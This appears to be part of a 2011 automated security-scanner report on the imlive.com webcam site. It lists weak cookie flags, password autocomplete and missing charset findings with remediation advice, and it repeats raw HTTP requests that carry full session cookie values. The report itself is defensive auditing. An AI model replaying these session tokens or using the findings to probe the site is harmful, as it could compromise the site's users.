<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webcam-faq/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webcam-sign-up/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp&waron=yes&promocode=YZSUSA5583 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-MX" lang="es-MX" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: mx.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-NL" lang="nl-NL" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: nl.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nn-NO" lang="nn-NO" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: no.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-RU" lang="ru-RU" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: ru.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="sv-SE" lang="sv-SE" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: se.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr-TR" lang="tr-TR" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: tr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /categoryfs.asp?cat=232 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:17 GMT Connection: close Content-Length: 18918 Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]...
GET /categoryms.asp?cat=2 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:18 GMT Connection: close Content-Length: 21809 Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]...
GET /compliance.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:42 GMT Connection: close Content-Length: 1925 Vary: Accept-Encoding
<html> <head> <title>Compliance - Live Video Chat at ImLive</title> <meta name="description" content="Our live video chat hosts are at least 18 years old. ImLive complies with 18 U.S.C. §  ...[SNIP]...
GET /liveexperts.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:18 GMT Connection: close Content-Length: 19369 Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]...
GET /localcompanionship.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:20 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:20 GMT Connection: close Content-Length: 16528 Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]...
GET /minglesingles.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:19 GMT Connection: close Content-Length: 16092 Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]...
GET /sex_webcams_index/index.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
